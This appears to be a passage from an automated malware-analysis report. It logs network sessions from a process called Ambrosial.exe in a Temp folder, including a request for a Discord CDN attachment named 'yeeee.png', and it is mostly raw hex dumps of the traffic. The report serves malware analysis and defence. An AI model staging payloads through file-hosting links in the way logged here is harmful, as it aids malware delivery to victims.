                                                                                                                                                                                      2021-10-30 11:52:12 UTC429INData Raw: cd b6 11 4a be 43 ad f2 2a 4c 4c b3 b6 c5 d7 fc 9b da d6 7c d9 c4 93 9a 05 b8 ee 2a 0a 36 4f 80 7c 55 09 1e fc 58 8a c4 b6 7d f2 21 1c 46 5a 0c e9 a9 63 dc 2a 41 99 9c 39 51 fa 50 49 84 7e 2b 13 89 85 bf 47 56 df 29 93 ec 04 e3 48 d6 d4 86 ca a2 1b ac e3 0f df b2 a5 8e fc cc 77 c2 66 8d d0 56 c7 37 7f fd a0 2e b5 47 ca 24 2c 89 d8 f0 ef 94 9c 95 7e 25 6d fe 08 94 75 49 48 3d 23 fe ea 57 ad 5f ac 69 af 6b 60 7d bc af 24 6d 7d fc 69 d9 3a 7e fc 49 1d 0a d4 67 7b 48 85 41 d8 7a c6 ab 44 97 09 da 77 fc 41 8a c9 9a cf 3d 3d bd ec f9 f4 1c bc ff ad bf f1 8f be d1 81 08 c1 59 2a 29 27 81 43 a7 13 a9 3b 30 78 10 d6 99 0f c8 67 6d 88 52 ac ba 2f a0 1d dc 97 40 13 66 68 6d e9 24 47 65 b2 dd 9b 17 e9 3f 3d 41 28 7e f9 0e d0 56 b1 37 29 e6 4d 70 63 ee 4b 2c 80 11 42
                                                                                                                                                                                      Data Ascii: JC*LL|*6O|UX}!FZc*A9QPI~+GV)HwfV7.G$,~%muIH=#W_ik`}$m}i:~Ig{HAzDwA==Y*)'C;0xgmR/@fhm$Ge?=A(~V7)MpcK,B


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      7192.168.2.349754162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:16 UTC432OUTGET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:16 UTC433INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:16 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 117969
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646fbf2ca0c2c7-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113695
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "57b901d65f2725d394d569c05dd34fa4"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:16 GMT
                                                                                                                                                                                      Last-Modified: Tue, 18 May 2021 00:16:50 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1621297010897343
                                                                                                                                                                                      x-goog-hash: crc32c=8ngaGQ==
                                                                                                                                                                                      x-goog-hash: md5=V7kB1l8nJdOU1WnAXdNPpA==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 117969
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdsX4slFsYSJeRA6EI0jVRIm59FopZLgvJoW6XM86ZFw0D_4eAHny8EUeC3p7xVvhYZoCwPvPtkjhww7s9dXegs
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fv7UgfnmJF2Yndq2q5bGlIveAGuRQz7nmNym1%2FPTRJa8HfX%2FNGGxIj7BL%2FGYRsrZ8mcEIWBprfEV7dDmMBSsrX8022bKVhHSEJ7QhzQlY1bmlv%2BCCAMETPO4WtHFEAtmA8aT2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:16 UTC434INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:16 UTC434INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ac fd 7b cc 75 5b 96 d6 87 ed f7 7b bf cb b9 54 9d aa ae ea 7b 53 5c 1b 0c ed 06 37 dd 98 36 77 b7 c1 dc 62 05 48 22 30 98 a6 2f 60 08 b2 85 44 94 44 89 a2 84 8a 64 e5 9f e4 8f 44 f9 c3 4a 22 45 b1 1d e7 a2 24 8a 6c 29 02 d9 4a 14 2e 31 b6 51 07 83 02 6e 4c d3 40 43 43 bb e9 aa ae db 39 e7 bb 7f 79 7e cf 33 c6 9c 63 ad 77 7f e7 9c 2a 18 7b 8f f5 8c 31 e6 9c 63 5e d6 5c 73 8d 77 ae bd f7 7b f3 f2 c7 fe cd 57 37 af 5e 5c 2e 2f c4 2f e1 e7 c1 d6 49 7b f5 f2 22 45 fc ea 72 b9 11 df 93
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^{u[{T{S\76wbH"0/`DDdDJ"E$l)J.1QnL@CC9y~3cw*{1c^\sw{W7^\.//I{"Er
                                                                                                                                                                                      2021-10-30 11:52:16 UTC435INData Raw: 69 79 f9 31 76 fa d4 fb 0f 1f b8 d2 2d 93 1e 96 e9 0a f7 75 c8 88 e4 35 fb b1 d3 db 37 bc d3 cd a7 32 3b 5f 78 b6 eb d0 3f cb 23 df c8 b3 f3 ee f4 2e d3 9c 7c 5d ee cc c7 bc 32 65 0c 26 eb 00 36 65 d5 2c ae b9 39 a9 66 f5 e1 15 ab 8e a3 48 eb 1f 44 69 43 da 75 e6 6b 74 48 2b 61 e6 a5 2f 4d 11 d3 00 e4 03 eb d0 ab 22 0c 45 de 6d 81 96 3c 1c 6f e9 48 6b 2c ea ba 7f e9 3f 90 5f 1a 5f 2a b0 23 b8 7b f1 42 81 61 b3 ee 69 2d 3f d3 7d ed b9 ee 6f cd 2f 14 33 bd 90 ed 85 ee 75 70 62 1d b9 d6 62 dc f1 cf 2b dd 5f c3 2d 6f bc b7 82 af 0e ce 26 9e d9 79 d5 f0 46 55 1c 96 cc 0a 78 b8 e1 de 65 47 bd ab 51 85 c5 bd 91 b7 74 f9 4a fe a0 46 46 09 0a 3b d2 7a 0d 6e ef 83 25 14 39 72 6e 65 ca 98 11 5f 24 5f 7e 25 a5 59 1e 17 d3 85 de 5d f3 0e 5b d9 5a 56 33 cd 33 60 db 28
                                                                                                                                                                                      Data Ascii: iy1v-u572;_x?#.|]2e&6e,9fHDiCuktH+a/M"Em<oHk,?__*#{Bai-?}o/3upbb+_-o&yFUxeGQtJFF;zn%9rne_$_~%Y][ZV33`(
                                                                                                                                                                                      2021-10-30 11:52:16 UTC437INData Raw: 72 35 21 94 36 f5 4d b8 03 a5 0e d2 9e cb 43 ef a4 f1 f9 34 07 6e ca bb 3e ab a6 d2 be b9 c1 50 c9 b6 4b 68 8e df f8 4a e0 17 99 5d 36 63 5a 5a f9 5a df e5 1d 9c 81 8e be 54 81 30 17 01 5c b2 93 32 51 c2 92 f5 e2 0d 61 6b 19 ca 4d 39 64 b1 0f bc 91 17 97 61 72 65 a2 6d 5a 3a e4 2c ed b3 5c 6d a5 02 07 69 25 47 97 ca c0 f9 dc 8b 57 a0 86 ae f3 8a ee 39 55 ec 59 ac 34 98 bf 24 c0 f6 27 4a fd 43 26 a9 6c 8d c7 71 14 57 bb e3 5a e3 bc fa d1 69 1d a8 c5 ee b1 97 6c e7 03 3d b6 83 f7 f9 a8 14 cb 35 1a 25 93 e2 c5 d6 f9 9d e0 b4 28 10 39 9c b1 68 a4 ed 2c 39 e4 1d 5a 42 51 e7 29 8e 0b 1d ba ae c5 95 05 32 96 6d 19 af 53 fc ed 5c e0 64 c8 3d a9 8c 6d fb aa c8 e7 fa 44 3e 67 4d 59 e8 22 e5 70 48 f3 b1 29 2d 68 db 2e a7 f3 bb e4 e8 4d 67 bd 0c e6 43 bd 20 b6 92 a1
                                                                                                                                                                                      Data Ascii: r5!6MC4n>PKhJ]6cZZZT0\2QakM9daremZ:,\mi%GW9UY4$'JC&lqWZil=5%(9h,9ZBQ)2mS\d=mD>gMY"pH)-h.MgC
                                                                                                                                                                                      2021-10-30 11:52:16 UTC438INData Raw: 7c 48 ab b1 6e bb 0e 9e fd 12 d6 55 60 db 3e 27 6d 03 39 b4 6e b5 84 3b 79 75 08 0e ee f4 ca 93 b9 5c 5c af 55 ef e0 43 be 0f e0 99 cf b2 ea b9 1b 78 c8 e6 3a 86 ad 74 e7 75 99 cd 4e ff 00 9e 79 5f c7 f9 ec 57 fc 9f 03 a4 fe 9c d8 62 9d 84 5d b6 6d 23 1d fb d4 97 1c fb e1 f3 67 4e 1b be ac 6f ee 3e b7 ac f7 66 46 22 ef 3a 4c 1a d7 cd b8 ce 66 e6 2e 3f 0b 23 1d af b8 af 86 28 77 bd ec 6b 3d 56 c2 6c e2 94 9b 7c 6f b0 70 2d 1d 4b ac e4 73 a0 a6 9b 0a 3b 65 79 ec f9 f2 f2 8c 20 8d 60 ad 82 34 07 6b 87 40 8d 7d 38 91 da c3 38 73 6e f8 86 7e 07 6b c8 7b 37 ad 1a 2d d8 01 59 82 b3 0e ca 5a 9e 21 53 48 93 c7 0a 3e da 0f 67 a2 f5 f6 9f fb 50 6c f7 14 a8 fd fe 7f 61 07 6a cf 08 d2 1a 65 53 c7 12 a8 c9 b3 3a 93 56 a9 1c 35 e3 60 55 d8 54 32 37 57 d2 60 f2 c3 ec 9e
                                                                                                                                                                                      Data Ascii: |HnU`>'m9n;yu\\UCx:tuNy_Wb]m#gNo>fF":Lf.?#(wk=Vl|op-Ks;ey `4k@}88sn~k{7-YZ!SH>gPlajeS:V5`UT27W`
                                                                                                                                                                                      2021-10-30 11:52:16 UTC439INData Raw: 06 d8 41 5f 7e 07 55 e3 65 19 cc da df f7 74 36 62 96 6c d6 e8 82 bc 5e fe 5f 3e fb ca 5f 26 e8 00 6d 05 6a b2 65 eb 43 b9 3d 2c c1 fe 7e 35 c1 1a 7c 2d 50 f3 f7 8d c5 6a 98 6f 7a ba 19 7a b7 04 b7 cf 74 73 74 a0 96 2f 11 3c af 1f bc 35 23 2b 58 23 48 7b 55 41 da cd 33 dd 3e 15 a8 dd aa 5d fe 8c 1a 81 5a 05 67 1d a8 39 f4 d1 49 9a 37 45 b7 58 87 be 01 67 07 6d ef 9a 39 48 ab 00 6d 07 6b 09 de 12 a8 a9 2d 42 07 6a d5 f7 0e 7e 3a 50 0b ab 9b c2 0c a8 48 48 e8 b6 7e fc 16 f9 d5 fe c9 59 5a 19 44 27 af 4a b9 4c c9 b2 fb 0c 95 1d c6 77 e3 3c 91 be a1 17 6e ee c0 b1 da 27 af 09 d0 90 83 f9 31 5c b5 c2 79 82 1d ac b9 2f fc f0 2d 28 76 93 e4 a3 51 92 db 12 0d ec b6 d3 ee f4 2b 7d 28 84 09 d2 84 09 d0 90 41 65 b1 0e e2 25 08 91 7e 87 aa 4e e7 d4 3b 75 0b 4b a6 28
                                                                                                                                                                                      Data Ascii: A_~Uet6bl^_>_&mjeC=,~5|-Pjozztst/<5#+X#H{UA3>]Zg9I7EXgm9Hmk-Bj~:PHH~YZD'JLw<n'1\y/-(vQ+}(Ae%~N;uK(
                                                                                                                                                                                      2021-10-30 11:52:16 UTC441INData Raw: 4d 35 c6 34 a2 10 8b 3f 97 66 79 e3 0a d4 74 3e aa a5 0e c8 4a 2a 99 ee f0 02 69 7b 64 c8 7d 8d 94 44 8b db 66 b7 60 c9 dd 96 cc 08 a1 0e c8 1d ac ad 40 4d f2 21 70 ab b4 c6 f8 a1 4e 2a 08 a6 2d c1 0f 0d a4 5c 3b 10 e4 e2 cf bb ed e5 5a 44 49 64 fb 3d f9 ef c0 6d d7 93 32 71 c3 41 1e f1 cb 22 65 b9 98 94 42 28 7d 89 af 46 7c e2 30 be 4b 17 35 3a 63 51 fb 69 3a eb 77 0d 83 b6 9b eb 54 65 5f 57 07 fd 33 d6 f1 a8 9f d3 4f 34 ea b6 b8 fa 16 8a cd e2 a2 93 7a 85 5e 93 63 99 23 9c aa 32 cd 2c 8c f9 a4 ce 7f cc b3 85 b6 1b 4b 69 5b a4 e3 40 18 d6 a0 48 c8 3b b4 84 8f 4e bb 2e 64 69 c3 30 d3 4c cb c0 bc 2a 11 b2 ac 43 db 66 9a c8 cd aa 76 ae f9 7b d2 0f e7 bb d2 ee d2 c9 f1 89 3e 38 f5 f5 74 b5 9c 8c b1 ef d4 bb e7 f2 74 b6 a5 1c f4 2b 74 27 bd c7 c3 62 24 8f 89
                                                                                                                                                                                      Data Ascii: M54?fyt>J*i{d}Df`@M!pN*-\;ZDId=m2qA"eB(}F|0K5:cQi:wTe_W3O4z^c#2,Ki[@H;N.di0L*Cfv{>8tt+t'b$
                                                                                                                                                                                      2021-10-30 11:52:16 UTC442INData Raw: 1d ed 57 6a 5a a6 08 19 83 1e 9b 60 82 9f 0e 74 c2 7a 6f ac 7c ae ed d0 28 30 f2 9e 8f 8d 77 e9 9c b2 8a 98 ee 96 eb 39 c7 31 ed 4b 9b 57 3b 65 78 21 84 fd bb 67 6d 1f ac b7 cb da 53 a1 fd 0e b9 39 3e c7 8e 9a 82 2f be 28 40 20 f6 9e 38 ff 98 9d c7 9f 0a d4 14 a4 21 1f 03 b5 e7 f2 c1 ea 9f 75 38 8f 3f 6f b3 93 e6 20 ac 83 b2 04 66 09 dc 7a a7 ad be 68 20 fd 5a b0 76 de 51 7b ed 67 d3 78 21 88 7c c4 0e bc f8 37 fe 04 bd d4 8d 54 0d f4 48 0a a5 eb 50 4c 5e a1 73 8b 3b 12 e8 cf a9 f9 ce 2f 63 cb 8e 12 c4 04 28 02 0a ed 40 4d fc 5c b2 02 b1 0e d6 08 cc fc 9f 08 08 d0 3a 48 e3 f3 72 a0 da d3 41 1a ed 23 38 4b 80 a6 db ae 9b 84 9c 36 42 d6 28 96 1c 0e d4 d6 4e 9a 83 b0 6b 81 5a 21 f6 ca 73 dc 51 1b 35 d0 35 c0 a8 da 86 4e 57 33 c0 a5 90 a3 f4 04 69 1b 8f 01 da
                                                                                                                                                                                      Data Ascii: WjZ`tzo|(0w91KW;ex!gmS9>/(@ 8!u8?o fzh ZvQ{gx!|7THPL^s;/c(@M\:HrA#8K6B(NkZ!sQ55NW3i
                                                                                                                                                                                      2021-10-30 11:52:16 UTC443INData Raw: cd cf a5 75 90 d6 c1 d9 e3 57 b7 b6 cf 40 ad 3f d3 d6 be f0 db fd f1 51 07 b7 05 6e 99 83 a4 80 2d c1 25 1f 83 33 dd 6e 87 5c 58 7a 5c b4 5c 69 31 5a af 2c c9 63 c4 ea 14 cb 9c 0a c6 c8 a7 49 4c 90 d6 a7 a9 03 b3 b3 9c 2f 14 c4 96 40 0d 3f 15 a4 95 dc 8f 3e 9b 7a dc b3 73 c6 a9 ca 78 f1 b8 33 48 ae a4 a7 75 3a 4a 36 ca 69 da 99 b6 ad 20 ad ed 42 eb e4 28 7b cb 65 40 38 c8 35 2b 56 90 46 da 6e 63 b7 b7 b8 74 4d 2f c9 ba d0 87 9c f4 42 71 1f 5d 3f 28 ff b4 39 6d a4 bd 85 a5 eb bd f2 86 52 de 95 4a 0e e0 5f 82 93 92 4e 09 73 95 6f 9f 1d a4 b5 7f a3 f3 1d 6b b1 ef 3a 76 fb bd 80 b5 cd d8 e4 4a a8 05 47 f1 35 fd 2e 7d e4 6b b2 38 f4 41 cb 7a 25 39 a6 53 42 a9 57 b2 9b 76 7b 8f 74 b0 a3 2c 07 c3 d3 c1 a9 94 bc 3f 94 9c e7 5a c5 d7 0a 6b 8c 0e 74 ae c3 4a 2c 43
                                                                                                                                                                                      Data Ascii: uW@?Qn-%3n\Xz\\i1Z,cIL/@?>zsx3Hu:J6i B({e@85+VFnctM/Bq]?(9mRJ_Nsok:vJG5.}k8Az%9SBWv{t,?ZktJ,C
                                                                                                                                                                                      2021-10-30 11:52:16 UTC445INData Raw: 49 47 cd b4 b3 5e a1 58 55 c5 6b e8 b5 09 ab 1f 07 52 f6 f2 e8 e3 d5 e2 a3 32 ff 21 f8 55 93 47 e1 ba ef 0f a0 55 6d 17 7e 5d 79 37 49 07 f0 9a 3c e0 83 29 73 60 51 95 bf 6b 7b 8d bb 6e 67 43 77 40 c0 9c 88 8c 72 44 27 71 c8 85 b0 9f c0 b4 6c 73 30 99 45 dd 28 a1 ef 07 46 da 5a 28 5b eb 34 d6 b0 8b 1c 10 da 57 92 a8 12 56 ba 51 07 d0 50 32 74 ce 0b 4d b9 68 78 5f d4 5d b9 4a 67 87 56 07 1a 0a 4d 9d 76 a2 6e 9f 8f a8 6e 7d 65 27 50 d9 36 b2 22 05 43 c1 34 b4 6d ab 37 82 0f ea c2 4c 8b 3c 2d e5 ad ea ea 7a 13 3c 11 a0 dd 0d d2 fc bf 37 9b 15 54 ad e0 8d 20 4d 41 53 3f fe e4 c5 15 d7 b5 75 dd 41 52 75 24 1f f5 88 0f 5f 26 18 3b 6a 79 fc 29 ae dd 34 02 b5 c7 0a d4 f8 61 5c be 48 40 39 cf 2f 11 d3 94 2f 13 f0 d9 b4 04 5e 04 6b 23 48 7b 10 74 a0 66 3d d8 bb 69
                                                                                                                                                                                      Data Ascii: IG^XUkR2!UGUm~]y7I<)s`Qk{ngCw@rD'qls0E(FZ([4WVQP2tMhx_]JgVMvnn}e'P6"C4m7L<-z<7T MAS?uARu$_&;jy)4a\H@9//^k#H{tf=i
                                                                                                                                                                                      2021-10-30 11:52:16 UTC446INData Raw: 61 33 28 7b ab e4 60 05 70 23 40 0b f3 e5 03 82 b4 7e ec a9 60 8d dd 34 f9 a5 1f bc 9b fa fc 78 cc 24 ad e0 56 13 be 1f ff de 7c e9 0f ff c1 15 7f 18 18 88 52 32 18 25 63 b7 0c 4e 39 e9 96 05 39 88 56 ed 91 51 d7 a2 d3 81 59 e9 96 17 eb 00 42 c6 52 0c 71 1e 4b 82 34 02 81 0e d2 1c a8 55 e0 d5 bb 69 fb 71 27 41 5a 07 68 09 dc 1c cc 15 13 a0 f5 8e 1c c8 a0 74 90 46 7d e8 5d 6f 48 d8 62 c9 1e 81 42 8f 91 15 e4 61 b3 62 6d c8 b8 28 1d cd ef 63 9a 2d 56 50 23 74 5a 52 73 88 cc 84 2e 59 87 5a 1f 97 7d 71 d9 a7 be 1f 7d c2 1d a8 ed 74 fc e9 5d 6d b1 84 60 cc 05 df 41 5a 8f 17 e7 a8 04 53 72 41 95 3b d8 fd d0 21 f5 d0 5f 26 f5 94 c1 ce 6b 61 95 85 1a 43 c9 7b 97 62 dc 4d e2 d2 ec 36 46 46 89 8d b9 69 69 a4 4b b0 1c ea 3a d2 26 c6 89 7a 8b f5 62 dc 5a 26 5d 62 95
                                                                                                                                                                                      Data Ascii: a3({`p#@~`4x$V|R2%cN99VQYBRqK4Uiq'AZhtF}]oHbBabm(c-VP#tZRs.YZ}q}t]m`AZSrA;!_&kaC{bM6FFiiK:&zbZ&]b
                                                                                                                                                                                      2021-10-30 11:52:16 UTC447INData Raw: 48 71 20 05 b2 70 95 ec 6a 38 54 45 33 58 cb df 48 7a 55 75 5d 5b 0a 05 5d d4 08 f3 d7 6b ea de b6 e4 0d a2 5b 2d 3a 28 8b 96 f5 4e f2 b5 fc b2 5d 77 23 f3 6b 12 26 75 f1 ac 6e 57 68 8f ad e9 a4 42 2e 79 ad 78 8d db 1e c0 89 27 9b a9 85 6a 54 3b 9e be c9 5e 65 8c 2b 30 29 59 90 43 08 c9 63 6f 7f 03 a1 85 81 73 3b 86 9b 03 2d b3 cb e9 00 0e df 09 c0 da 26 9e ba e7 5c e9 d8 9d 16 7d 05 6e 7a 83 c0 3e a8 56 2a ae be a7 af 12 66 ff e7 e3 cf 4e 23 af 38 c5 7c 30 d9 5e 64 71 d9 67 9e 25 2c db 2a 28 58 2b 57 a7 89 dc dc a2 29 43 67 bd 29 f6 e9 ab 65 50 5c b6 fd 85 96 b6 41 4b 38 88 9b b6 f1 4e b2 0c d3 f6 3a f9 9c ef 4c e7 b4 d6 17 56 79 98 00 03 7d 05 68 b0 ce 53 02 0d a1 83 a7 3c f6 5c 81 da b3 bd ab c6 b7 33 b1 b3 13 96 6f 7e e6 a7 32 38 57 cc 2b 82 34 02 9e
                                                                                                                                                                                      Data Ascii: Hq pj8TE3XHzUu][]k[-:(N]w#k&unWhB.yx'jT;^e+0)YCcos;-&\}nz>V*fN#8|0^dqg%,*(X+W)Cg)eP\AK8N:LVy}hS<\3o~28W+4
                                                                                                                                                                                      2021-10-30 11:52:16 UTC449INData Raw: dd 03 61 e5 e9 35 24 a7 86 40 83 8d cf 0e 36 14 9c 09 7b 37 2d 8f 3d 3b 50 eb 5d 35 76 bb 08 d6 fa f3 69 09 d2 78 64 f9 42 e8 1f 9f 95 8f d4 5c 9f 19 73 a0 96 60 ad ff 1d 93 77 d7 94 ee 35 2f 8d 73 59 82 bd ec d2 e5 b1 67 ff 3c 47 3f f6 fc 72 05 6b 09 d4 12 0c 39 50 d3 c9 24 f8 e3 f3 69 0e d4 14 98 bd ad 20 ad 03 b5 b7 c5 7b 37 8d cf a6 dd 5e 1e 11 d4 55 a0 76 5f ed 20 50 73 40 69 24 40 eb 5d b5 6a a7 18 ca 38 1e 83 34 3f f6 64 8c 34 0e 0e 66 dd 36 45 28 9f 77 a0 46 31 1d 7a c6 81 65 2b 9f 12 23 33 68 79 27 01 5c 59 96 4d a4 41 6b 84 5a b6 6a ec e0 2c e8 80 ab 90 c7 98 33 58 43 66 04 91 2d 2a 4f 64 f2 6d ce 63 cc 3c fa 24 10 eb 47 9d f9 02 c1 ed b2 77 90 96 ff 3e 70 6f 3d ea c4 07 3e db 7f 63 26 65 d9 94 05 19 32 d6 00 65 f0 35 02 1e 27 d8 da d2 7d 82 9c
                                                                                                                                                                                      Data Ascii: a5$@6{7-=;P]5vixdB\s`w5/sYg<G?rk9P$i {7^Uv_ Ps@i$@]j84?d4f6E(wF1ze+#3hy'\YMAkZj,3XCf-*Odmc<$Gw>po=>c&e2e5'}
                                                                                                                                                                                      2021-10-30 11:52:16 UTC450INData Raw: 3b 65 09 d6 ea f3 68 15 ac ed 20 4d 79 75 72 53 a6 03 35 e8 58 0f 13 33 be 5b 06 8f 79 b3 08 d1 bb 42 71 6e c6 43 76 52 6c ac 73 94 8d 9e e2 d1 27 42 db 66 12 a4 44 d1 32 6f 5b 97 05 2c ea d0 f2 e2 b2 ad 40 ec 60 a7 b7 d1 f7 7a 9c 1a 48 4f c0 b9 6d e9 5b a7 fb 98 74 2c 79 2f b2 3c 6c ce 5e 68 1f c6 29 0b d5 c8 0e 3c d0 5b 76 db d0 ef d8 4b 2f fb 51 de be 39 00 10 b6 3b c4 04 2d 8a 98 05 ab 51 47 27 f4 cd 33 37 8f 2d 27 e7 26 57 c9 8b 36 18 4b d6 a1 c7 94 83 51 fa 22 8b f1 1b a9 88 b2 c6 ed c7 be 7a 3c ba cf 63 1c 18 b4 2e b3 fd 55 9b f5 f2 fc 96 d2 b5 ad ba 20 7c 34 96 dc 7e a3 37 8e bc 4d a5 cc b5 a0 e9 60 ba 93 7e f0 72 87 8e fe 4a 11 ac 52 2b 5d 42 cb 07 2c a5 6d 93 ee d8 64 c0 66 d6 08 71 97 12 1b 1d 9c 49 26 58 93 dc 41 db 62 bd 43 08 6a 1d 0d 74 23
                                                                                                                                                                                      Data Ascii: ;eh MyurS5X3[yBqnCvRls'BfD2o[,@`zHOm[t,y/<l^h)<[vK/Q9;-QG'37-'&W6KQ"z<c.U |4~7M`~rJR+]B,mdfqI&XAbCjt#
                                                                                                                                                                                      2021-10-30 11:52:16 UTC451INData Raw: db 07 88 47 da 7c c0 4a 34 8a 76 d1 f2 6b db 51 76 aa 20 59 e7 71 52 79 9c d0 95 34 1d f4 63 fe 49 f6 3d 1c 1c 03 35 1d c0 65 2b 61 e9 8d 2d 14 1d d2 33 1e 3e e8 e2 77 80 26 3e 04 68 ba 73 05 2b 50 d3 42 eb b4 0c 64 b5 89 43 0d cc 79 40 c8 56 79 b3 73 a4 b2 d4 05 52 0c f4 d8 4a d4 39 d5 64 11 27 30 9b 81 1a 73 dc b2 de 3e 09 83 70 d3 e4 ba ae d1 2c 82 1b eb 08 81 e5 b3 4f b0 d5 96 0b 75 70 b6 95 d7 96 4a 0b 0d b1 1a 46 9f ad d1 b8 c8 b3 ef 57 30 22 47 9b 86 9b 6d 6b 4a 5a d6 ba d2 7c 4e 6a 05 37 92 d6 4c 9e 2d df 45 a4 2d 9f 48 09 a4 cd fa 8f a4 84 bc 97 1c da f2 4c bb 56 cf d9 b6 f4 53 42 b9 5b 6d c9 38 c5 2f a6 9e 73 b6 16 22 58 d4 d1 53 51 92 03 09 a1 1f 6f ca 00 3b f0 42 36 26 10 7b 8a 3c 99 fc 25 27 40 a3 3c 98 47 7c fd 7b 67 7c 26 ad 1f 79 be 7c 05
                                                                                                                                                                                      Data Ascii: G|J4vkQv YqRy4cI=5e+a-3>w&>hs+PBdCy@VysRJ9d'0s>p,OupJFW0"GmkJZ|Nj7L-E-HLVSB[m8/s"XSQo;B6&{<%'@<G|{g|&y|
                                                                                                                                                                                      2021-10-30 11:52:16 UTC453INData Raw: 49 9f 65 2c c7 4f 8b ad b8 e4 aa e3 8c 88 25 14 b6 4a 86 25 8a fa dc 99 ba 4d 6d ea 31 19 72 b2 6c 79 61 c9 d0 96 95 0f 68 92 72 58 f3 24 4f ec f4 d8 c2 d0 01 4b 09 74 ca 94 8e 74 ae bf 75 b7 6c e8 91 4b 5b 46 28 ca f4 df f2 35 db b9 21 6b 4c ca 3f 98 29 19 99 83 e7 9a d3 9c 50 f9 9d db c8 5a d6 41 5a 1e 75 76 40 76 d1 3d 3a c1 18 b2 51 fa 0c da b2 a3 a6 cb c2 18 3f c8 1d a8 85 47 a0 e6 6f 7a aa 46 05 14 0e d4 7c b7 a5 5b 15 a8 39 38 4b 70 94 0f f0 df f7 4f 63 3c d2 22 07 27 58 d3 e5 40 59 05 3b 2f 09 be 78 74 e8 47 9f 7c 71 e0 b1 bf 44 c0 63 4f 82 b4 2f 3c 79 ff f2 25 1e 87 56 a0 f6 54 e5 08 4a 89 19 6e fd e8 53 fe fd b8 f3 d1 e5 ed 47 6f fa 0b 05 6f ae 40 6d ec a8 29 2f ed 73 a0 a6 f2 7d 7f af 88 a3 e4 9c 9e be 16 18 df fe 81 db 73 a0 c6 a3 4e be 40 c0
                                                                                                                                                                                      Data Ascii: Ie,O%J%Mm1rlyahrX$OKttulK[F(5!kL?)PZAZuv@v=:Q?GozF|[98KpOc<"'X@Y;/xtG|qDcO/<y%VTJnSGoo@m)/s}sN@
                                                                                                                                                                                      2021-10-30 11:52:16 UTC454INData Raw: 8d 72 25 af 40 4d ec 00 85 1d 25 02 35 07 69 7c 26 0d 4e dd 0e d4 84 b4 8b b5 fa 96 cf a1 75 90 76 ab 00 c9 41 da fd cb 1b a0 d2 de d0 75 f0 46 05 6a 7c a1 80 40 ed 55 05 6a bd a3 c6 97 09 78 f4 e9 40 ed c9 fb 97 cf 3b 50 e3 9b 9f cf 2e ef f3 03 b3 2a 43 a0 c6 f5 76 af be 4c f0 c8 81 da a3 cb c7 1e bd b9 1e 7d c2 04 70 3c fa 64 57 2d 5f 6a b8 a7 4b 52 e5 d4 e2 7d 9e 8e 73 8b be 78 ee ab 5b 1e 57 fa cf 38 10 a8 79 8c 12 a8 e5 5b 9f 09 d4 d6 8e da 93 1f fa fe 0a fb 54 da 5e 85 53 97 bc 77 d4 0a 05 ea 8e 2b b4 ec 31 55 73 84 b6 39 58 53 61 67 89 dc bc 03 b5 04 61 3b 50 0b f6 8e 1a c1 5a 7f 0b 34 81 5a 36 12 bd 68 71 13 e6 25 19 e6 46 ec 7f 25 d1 fa b0 2d bd d8 5d 34 46 86 e8 03 4d d7 58 b9 6d 2b 38 6b 56 5a 30 c1 da e1 7f 81 4a 86 56 5b ee 30 43 58 88 ae bc
                                                                                                                                                                                      Data Ascii: r%@M%5i|&NuvAuFj|@Ujx@;P.*CvL}p<dW-_jKR}sx[W8y[T^Sw+1Us9XSaga;PZ4Z6hq%F%-]4FMXm+8kVZ0JV[0CX
